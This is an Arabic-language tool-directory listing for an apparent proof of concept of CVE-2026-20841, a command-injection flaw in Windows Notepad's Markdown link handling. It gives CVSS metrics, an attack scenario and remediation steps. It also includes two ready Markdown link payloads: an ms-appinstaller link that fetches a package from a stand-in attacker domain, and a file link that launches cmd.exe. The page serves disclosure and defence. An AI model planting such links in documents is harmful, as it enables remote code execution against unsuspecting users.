Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20841-PoC — إثبات مفهوم يوضح حقن الأوامر في "المفكرة" بنظام ويندوز عبر روابط Markdown مصممة خصيصًا، مما يتيح تنفيذ التعليمات البرمجية عن بُعد. يتضمن نواقل الهجوم، ومقاييس CVSS، وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/dogukankurnaz/cve-2026-20841-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHubdogukankurnaz/cve-2026-20841-poc

CVE-2026-20841-PoC

إثبات مفهوم يوضح حقن الأوامر في "المفكرة" بنظام ويندوز عبر روابط Markdown مصممة خصيصًا، مما يتيح تنفيذ التعليمات البرمجية عن بُعد. يتضمن نواقل الهجوم، ومقاييس CVSS، وإرشادات المعالجة.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20841 - ثغرة تنفيذ التعليمات البرمجية عن بُعد في تطبيق Windows Notepad

نظرة عامة على الثغرة

الحقلالتفاصيل
معرف CVECVE-2026-20841
العنوانثغرة تنفيذ التعليمات البرمجية عن بُعد في تطبيق Windows Notepad
الأثرتنفيذ التعليمات البرمجية عن بُعد
أقصى درجة خطورةمهم
CVSS v3.1 الأساسي / الزمني8.8 / 7.7
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
CWECWE-77: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر (حقن أوامر)
المنتج المتأثرتطبيق Windows Notepad (إصدار Microsoft Store، الإصدارات الأقدم من 11.2510)
الجهة المانحة لـ CNAMicrosoft
تاريخ النشر10 فبراير 2026
الإفصاح العاملا
الاستغلاللا
تقييم قابلية الاستغلالالاستغلال أقل احتمالاً

الملخص التنفيذي

يسمح التحييد غير الصحيح للعناصر الخاصة المستخدمة في أمر (حقن أوامر) في تطبيق Windows Notepad لمهاجم غير مصرح له بتنفيذ تعليمات برمجية عبر الشبكة.

قدّم تطبيق Windows Notepad الحديث (الموزَّع عبر Microsoft Store) دعمًا لعرض Markdown، والذي يتضمن روابط تشعبية قابلة للنقر. تكمن الثغرة في أن Notepad يفشل في التحقق من مخططات URI وتنقيتها بشكل صحيح داخل روابط Markdown قبل معالجتها. يمكن للمهاجم إنشاء ملف .md خبيث يحتوي على روابط مصاغة بشكل خاص، والتي عند نقر المستخدم عليها، تؤدي إلى تشغيل معالجات بروتوكول غير موثوقة لتحميل وتنفيذ محتوى عن بُعد.

مقاييس CVSS v3.1

المقاييس الأساسية

المقياسالقيمة
متجه الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدممطلوب
النطاقغير متغير
أثر السريةمرتفع
أثر السلامةمرتفع
أثر التوافرمرتفع

المقاييس الزمنية

المقياسالقيمة
نضج كود الاستغلالغير مُثبت
مستوى المعالجةإصلاح رسمي
ثقة التقريرمؤكد

الأسئلة الشائعة

كيف يمكن للمهاجم استغلال هذه الثغرة؟

يمكن للمهاجم خداع المستخدم للنقر على رابط خبيث داخل ملف Markdown مفتوح في Notepad، مما يؤدي إلى قيام التطبيق بتشغيل بروتوكولات غير موثوقة تقوم بتحميل وتنفيذ ملفات عن بُعد.

ما هو السياق المستهدف لتنفيذ التعليمات البرمجية عن بُعد؟

وفقًا لمقياس CVSS، فإن متجه الهجوم هو الشبكة (AV:N) وتفاعل المستخدم مطلوب (UI:R). سيتم تنفيذ التعليمات البرمجية الخبيثة في سياق الأمان الخاص بالمستخدم الذي فتح ملف Markdown، مما يمنح المهاجم نفس صلاحيات ذلك المستخدم.

سيناريو الهجوم

  1. يقوم المهاجم بإنشاء ملف Markdown (.md) يحتوي على روابط تشعبية خبيثة.
  2. يفتح الضحية الملف في إصدار Windows Notepad المتأثر.
  3. يعرض Notepad محتوى Markdown ويعرض روابط قابلة للنقر.
  4. عند نقر الضحية على الرابط، يعالج Notepad عنوان URI دون التحقق المناسب.
  5. يؤدي ذلك إلى تشغيل معالجات بروتوكول (مثل ms-appinstaller://) التي يمكنها جلب وتنفيذ حمولات عن بُعد، أو عناوين URI من نوع file:// التي يمكنها تشغيل ملفات تنفيذية محلية مباشرة.
  6. يتم تنفيذ التعليمات البرمجية الخبيثة بنفس صلاحيات المستخدم المسجل دخوله.

إثبات المفهوم

إخلاء مسؤولية: يُقدَّم إثبات المفهوم هذا لأغراض تعليمية وبحوث أمنية مصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني ويعاقب عليه القانون.

يوضح إثبات المفهوم متجهي هجوم من خلال روابط Markdown مصاغة:

المتجه 1 - تثبيت حمولة عن بُعد عبر إساءة استخدام معالج البروتوكول:

root@kitploit:~
[انقر لعرض المستند](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)

المتجه 2 - استدعاء ملف تنفيذي محلي عبر URI من نوع ملف:

root@kitploit:~
[انقر هنا](file://C:/windows/system32/cmd.exe)

العرض التوضيحي

عرض توضيحي لإثبات المفهوم

المعالجة

  • قم بتحديث Windows Notepad إلى الإصدار 11.2510 أو أحدث عبر Microsoft Store.
  • فعّل التحديثات التلقائية للتطبيقات في إعدادات Windows > التطبيقات > Microsoft Store.
  • لا تفتح ملفات .md من مصادر غير موثوقة في Notepad.
  • لا تنقر على الروابط داخل ملفات Markdown المستلمة عبر البريد الإلكتروني أو التنزيلات غير الموثوقة.

المراجع

  • MSRC - CVE-2026-20841
  • NVD - CVE-2026-20841
  • CVE.org - CVE-2026-20841

إخلاء المسؤولية القانوني

المعلومات الواردة في هذا المستودع مقدمة لأغراض تعليمية وبحوث أمنية مصرح بها فقط. تتم مشاركة إثبات المفهوم هذا لمساعدة المدافعين على فهم الثغرة والتخفيف من حدتها. المؤلف غير مسؤول عن أي إساءة استخدام للمعلومات أو الأدوات المقدمة هنا. احصل دائمًا على إذن كتابي مناسب قبل اختبار أي نظام بحثًا عن ثغرات. الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة جنائية في معظم الولايات القضائية. استخدم بمسؤولية وأخلاقية.

تنزيل الأداة